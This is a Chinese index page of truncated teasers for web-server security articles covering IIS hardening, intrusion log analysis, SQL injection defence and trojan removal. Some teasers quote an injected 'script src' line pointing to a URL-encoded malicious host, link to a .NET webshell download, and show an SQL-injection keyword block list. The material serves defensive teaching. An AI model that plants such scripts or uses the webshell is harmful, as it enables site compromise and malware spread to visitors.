win服务器:Win 2003 server打造安全的个人Web服务器
Win2003 Server安全性较的Win2K确实有了很大提高但是用Win2003 Server作为服务器是否就真安全了?如何才能打造个安全个人Web服务器?下面我们简单介绍下 、Windows Server2003安装 1、安装系统最少两需要个分区分区格式都采用NTFS格式 2、在断开网络情况安装好2003系统 3、安装IIS仅安装必要 IIS 组件(禁用不需要如FTP 和 S... [阅读全文]
入侵网站拿服务器:网站WebSite及服务器被入侵后
网站WebSite或者服务器被入侵后 如何办?当你发现被入侵后 会如何办呢 看看下 会不会对你有所帮助:第、先看看数据是否被删除如果数据被删除请保留证据这些信息可以当作法庭上证据 第 2取证用户证据包括:网站WebSite日志页面记录、系统日志记录等 第 3判断是否被植入木马可以通过手动或者工具进行查找比如灰鸽子先用各种工具扫描下看到底是那两个文件般都在c:\windows下接下来关掉所有IE窗... [阅读全文]
rootkit程序:web应用程序中的rootkit
[ 目录 ]0×00 为什么我们会有这个想法0×01 web应用中后门基本思想0×02 实际应用中些例子0×00 为什么我们会有这个想法毫无疑问web是近几年热点各种各样服务都开始网络化用户敏感信息也开始不只是存储在自己计算机里而开始存储在服务提供商数据库里用户无须为这些数据存储和处理消费本地资源只需要使用个终端就可以访问和使用这些数据而这些终端往往只需要个浏览器和些小小网速就可以了这样服务非常多... [阅读全文]
iis日志分析:一次IIS入侵日志分析过程
普瑞斯特原创个客户网站WebSite被挂马,同FTP下20几个站点全部遭殃.由于客户网站WebSite 3番 5次被挂马,所以在下决定对其网站WebSite进行次彻底清查,被入侵后最直接有效解决思路方法,就是查看服务器IIS日志,通过IIS日志提供记录,找到问题根源,彻底解决隐患,避免此类问题再次发生.通常我们可以从IIS日志中了解到以下信息:1.入侵者IP2.入侵者使用浏览器3.入侵者使用操作系... [阅读全文]
2003iis安全设置:IIS安全设置
什么是IISIIS即因特网信息服务作为当今流行Web服务器的它提供了强大Internet和Intranet服务功能因此现在采用IIS作为Web服务器软件Software单位还是很多默认情况下这些服务器必须允许公众访问其资源但我们发现许多单位在防御攻击上时间花费甚至远远多于维护和提供Web服务时间IIS安全不过这里攻击静悄悄除非你单位Web站点成为毁灭性攻击受害者或者受到某种恶意代码注入般来说黑客会... [阅读全文]
iis日志代码还原:IIS备份/ 还原
若要备份 IIS 配置请按照下列步骤操作: 1. 在本地计算机上 IIS 管理单元中单击 Internet 信息服务下面计算机图标 2. 单击操作并选择备份/还原配置 3. 单击创建备份选择备份文件名称然后单击确定备注:默认备份位置是 %Root%\system32\inetsrv\MetaBack 文件夹如果要将备份文件保存到其他位置可以将文件从该默认位置复制到另个位置在默认位置保存个副本以便方... [阅读全文]
无所遁形:详细查看系统记录追踪入侵线索 让入侵者无所遁形
在局域网络上可能你听过所谓“广播模式”资料发送思路方法此种思路方法不指定收信站只要和此网络连结所有网络设备皆为收信对象但是这仅仅在局域网络上能够实行局域网络上机器不多(和Internet比起来 )如果象是Internet上有数千万主机本就不可能实施资料广播(至于IP Multicast算是种限定式广播Restricted Broadcast唯有被指定机器会收到Internet上其他电脑还是... [阅读全文]
网站安全检测工具:15个在线网站WebSite检测工具
如果你希望网站WebSite能在区别浏览器下用户能够获得相似体验效果检测下你作品是道必须步骤这里我整理了些比较实用工具来帮助你检测各种可能出现问题譬如CSS、HTML错位、跨浏览器问题等等在线验证工具1. HTML Validatorhttp://validator.w3.org/网页结构检测工具支持HTML, XHTML, SMIL, MathML…….2. CSS Validatorhttp:... [阅读全文]
有关网站WebSite挂马的处理
2008年12月18日发现自己网站WebSite被挂马了当时心里慌立即检查了下源代码发现并没有可以代码出现于是稍微放松了心态不久个朋友发来QQ消息说我站被GG闭屏了这回我慌了立刻在GG上SITE了下我网站WebSite竟然提示“该网站WebSite含有恶意代码”字样原来网站WebSite还真有木马于是我开始检查自己网站WebSite从JS文件PHP文件等等找起终于在个ad_js.php这个文件上找... [阅读全文]
puttyssh:使用putty(ssh)密匙安全登录服务器
第步:生成密匙 运行puttygen.exe选择需要密匙类型(parameters)和长度(bits)putty默认使用SSH1协议长度默认值为1024我们暂且选用SSH1协议,后面讨论使用SSH2协议和使用SSH1协议设置上区别点击Generate生成密匙生成后 Key passphrase 和 Confirm passphrase 两项可以保持为空 passphrase是用来保护私匙密码如果没... [阅读全文]
phpmssql函数:用PHP函数解决SQL injection
SQL injection问题在ASP上可是闹得沸沸扬扬当然还有不少国内外著名PHP“遇难”至于SQL injection详情网上文章太多了在此就不作介绍如果你网站WebSite空间php.ini文件里magic_quotes_gpc设成了off那么PHP就不会在敏感前加上反斜杠(\)由于表单提交内容可能含有敏感如单引号(')就导致了SQL injection漏洞在这种情况下我们可以用addsl... [阅读全文]
ftpservu8.0教程:保护FTP服务器 做好Serv—U的安全防范
Serv-U是目前搭建FTP服务器使用最普遍服务器软件Software的因此如何用它搭建个安全FTP服务器是众多用户苦心钻研事情下面就将在日常使用中总地出来防范经验和大家起共享 、安装时两点注意 在安装Serv-U时就应该注意尽量不要将其安装在默认C:\Program Files\Serv-U目录下应该更换个不易被猜测到目录其次在安装时选择安装组件时般只要选中“Server p... [阅读全文]
iisweb服务器:加强IIS安全机制 建立高安全Web服务器
IIS作为目前最为流行Web服务器平台发挥着巨大作用因此了解如何加强IIS安全机制建立个高安全性能Web服务器就显得尤为重要 保证系统安全性 IIS是建立在操作系统下安全性也应该建立在系统安全性基础上因此保证系统安全性是IIS安全性基础为此我们要做以下事情 1、使用NTFS文件系统 在NT系统中应该使用NTFS系统NTFS可以对文件和目录进行管理而FAT文件... [阅读全文]
:十大安全窍门技巧 可以让你的网站WebSite远离危险
在网络攻击成倍增长今天网络反黑客保安全已经成为每个计算机用户必备课程要成为成功信息安全专业人士不仅需要不断更新最尖端安全知识还需要对商务过程和风险管理有深刻认识就现在许多IT公司现状来看基本上每个公司都有名或多名(部门)专职人员负责着公司内网、外网、服务器网络安全维护而随着网络应用不断普及和信息安全服务需求市场不断成熟逐渐出现了些专业以信息安全服务为主要业务团队(Team)、公司 大... [阅读全文]
物理路径:防止.NET木马列所有站物理路径 防止.JPG类型木马
转自:http://www.im286.com/thread-3742085-1-1.html前段时间单位服务器上被人上传了个.NET木马这次让我认识到以前没有见过上传木马招数同时也找出些对策咱落伍论坛很多都有服务器就分享出来给大家吧.net木马目前很强下载地址:http://www.rootkit.net.cn/article.asp?id=132 (你可以上传到你服务器上看看对你系统都能做什么... [阅读全文]
解决网页被script挂马的办法
现在挂网马方式改变了现在流行挂script木马汗了看了几个网友网站WebSite都被这样了——页面顶部或底部加上了: 注意以下地址含有木马请不要轻易访问:script src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%... [阅读全文]
本地安全策略:设置IP安全策略 将木马阻杀在端口的外
“木马”个让用户头疼字眼它们悄然无声进入我们系统叫人防不胜防当木马悄悄打开某扇“方便的门”(端口)时不速的客就会神不知鬼不觉地侵入你电脑如果被种下木马其实也不必担心首先我们要切断它们和外界联系(就是堵住可疑端口) 在Win 2000/XP/2003系统中Microsoft管理控制台(MMC)已将系统配置功能汇集成配置模块大大方便我们进行特殊设置(以Telnet利用23端口为例操作系... [阅读全文]
如何能有效杜绝木马干扰 防范后门病毒
虽然说亡羊补牢可以将木马后门造成损失降至最低但最好思路方法显然是防患于未然 1.后门防范基本功 首先要关闭本机不用端口或只允许指定端口访问;其次要使用专杀木马软件Software为了有效地防范木马后门;第 3是要学会对进程操作时时注意系统运行状况看看是否有些不明进程正运行并及时地将不明进程终止掉 2.安全配置Web服务器 如果公司或企业建立了主页该如何保证自己Web... [阅读全文]
如何防sql注入:网站WebSite如何防SQL注入
第种: squery=l(Request.ServerVariables("QUERY_STRING")) sURL=l(Request.ServerVariables("HTTP_HOST")) SQL_injdata =":|;|||--|sp_|xp_|\|dir|cmd|^|(|)|+|$|'|copy|format|and|exec|insert|select|delete|update... [阅读全文]
web服务器:教你如何才能打好WEB服务器安全攻坚战
、转换角色把自己当作可能攻击者 大部分时候我们若只是站在WEB管理员角度上考虑问题可能就发现不了Web服务器漏洞相反我们此时若能够换个角度把自己当作可能攻击者从他们角色出发想想他们可能会利用那些手段、哪些Web服务器漏洞进行攻击或许我们就可以发现Web服务器可能存在安全漏洞从而早先步修补安全漏洞防止被木马或者病毒攻击 从公司外面访问自己Web服务器进行完正检测然后模拟攻击自己网站WebSite... [阅读全文]
excel常用技巧:ASP常用窍门技巧
1.获得系统时间: %=now% 2.取得来访用IP: %=request.serverIvar/Iiables("remote_host")% 3.获得系统,浏览器版本: Iscript/I window.document.write("版本:"+navigator.appName+navigator.appVersion+" browser.") /Iscript/I 4.去除IE混动条: b... [阅读全文]
c语言中常见错误:ASP中的常见错误
ActiveServerPages,ASP0126(0x80004005)--找不到包含文件 MicrosoftOLEDBProviderforODBCDrivers(0x80040E21)--sql语句出错(数据类型不匹配或表名(字段名)或表处于编辑状态或表不存在于conn打开数据库中) MicrosoftOLEDBProviderforODBCDrivers(0x80040E14)--sql语... [阅读全文]
旁注web检测工具:Web安全工具大汇聚
SPI Dynamics (live) – http://zero.webappsecurity.com/Cenzic (live) – http://crackme.cenzic.com/Watchfire (live) – http://demo.testfire.net/Acunetix (live) – http://testphp.acunetix.com/ http://testasp... [阅读全文]
windowsserver:封堵Windows Server 2008几个明显漏洞
尽管Windows Server 2008系统安全性能已经无和伦比不过这并不意味着该系统自身已经没有任何安全漏洞了对于Internet或局域网中狡猾“黑客”来说Windows Server 2008系统中安全漏洞仍然比比皆是只是它们隐蔽性相对强点而已;如果我们不能对些重要隐私漏洞进行及时封堵“黑客”照样能够利用这些漏洞来攻击Windows Server 2008系统为此我们需要积极行动起来... [阅读全文]
被人遗忘的一些安全问题
被人遗忘些安全问题这么多年以来,很多web被黑过来黑过去,很多员开始认识到些直接主要安全漏洞方式,比如xss/sql-injection等.但是还有很多安全问题被人遗忘了[包括员和代码审计安全人员]:1.Url转跳忘记了https注意安全些往站都使用ssl来加固自己webapp,但是webapp员根本没有意识到这个问题[转跳都是强制使用http],导致ssl成为"花瓶".比如phpwindglob... [阅读全文]
modsecurity:使用mod_security加强Apache的安全性
. 介绍 mod_security是个集入侵检测和防御引擎功能开源web应用安全(或web应用防火墙). 它以Apache Web服务器模块方式运行, 目标是增强web应用安全性, 防止web应用 受到已知或未知攻击. 本文使用系统是Redhat linux高级服务器版3, 推荐大家使用modsecurity最新稳定发行版, 现在是1.8.7, 安装方式是通过DSO(动态共享对象)把... [阅读全文]
ts服务器黑名单:网络安全的 7种思路方法防范网络服务器被黑
你网络服务器安全么?是否存在安全隐患?怎样才能不让自己网络服务器被黑呢?看看下面内容是否对你有所启发 1、对数据库进行安全配置例如你连接数据库所使用帐户/口令/权限如果是浏览新闻用只读权限即可可以对区别模块使用区别帐户/权限;另外数据库哪些存储过程可以也要进行严格地配置用不到全部禁用(特别是cmd这种)防止注入后利用数据库存储过程进行系统; 2、在获取客户端提交参数时进行严格过滤包括参数长短、... [阅读全文]
怎么攻击网站:看看你的网站WebSite是如何被攻击的
每个网管最黑暗时候莫过于服务器被攻击后束手无策其实服务器遭受攻击后服务器记录文件详细地记录了黑客活动蛛丝马迹在这里我为大家介绍下两种常见网页服务器中最重要记录文件分析服务器遭到攻击后黑客在记录文件中会留下什么记录目前最常见网页服务器有两种:Apache和微软Internet Information Server(简称IIS)这两种服务器都有般版本和SSL认证版本本文将使用和现实黑客攻击手段类似攻击... [阅读全文]
网站安全性测试:网站WebSite测试中如何做好安全性测试
安全性测试(security testing)是有关验证应用安全服务和识别潜在安全性缺陷过程 注意:安全性测试并不最终证明应用是安全而是用于验证所设立策略有效性这些对策是基于威胁分析阶段所做假设而选择 以下是我读软件Software评测试教程中Web安全性测试章节内容并进行修改笔记前面看了好多朋友写不过不是很全希望对大家有所帮助建议大家还是买本软件Software评测试教程此书绝对物超所值^_... [阅读全文]
安全注意事项:ASP安全编程注意事项
很多人抱怨ASP安全不高、速度不快其实ASP也很优秀用PHP样可以写出拉圾用ASP依然可以写出很优秀安全高不高取决于编程者PHP依然可以写出漏洞百出所以别抱怨ASP这样那样毛病我写ASP已经 3年多了直都认为它很方便虽然有些地方写着很复杂及不上PHP这样ASP写着感觉更爽把多年整理总结些ASP常见安全事项写出来 、古老绕验证漏洞 虽然古老依然存在于很多小的中比如些企业网站WebSite后台... [阅读全文]
